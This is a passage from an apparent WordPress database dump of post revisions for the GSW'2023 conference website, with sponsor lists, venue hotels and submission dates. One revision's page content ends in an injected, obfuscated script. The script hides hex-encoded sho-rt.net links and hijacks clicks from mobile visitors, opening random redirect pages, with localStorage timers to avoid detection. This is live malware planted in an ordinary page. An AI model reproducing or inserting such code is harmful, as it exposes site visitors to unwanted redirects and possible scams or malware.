5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-01 08:38:00','2023-06-01 08:38:00','',3066,'https://gsw2023.com/?p=4598',0,'revision','',0),
(4599,1,'2023-06-01 08:43:20','2023-06-01 08:43:20','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685606798260{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685608624099{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p><a href=\"https://www.giscon.de/en/\"><img class=\"aligncenter wp-image-4597 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"300\" height=\"222\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 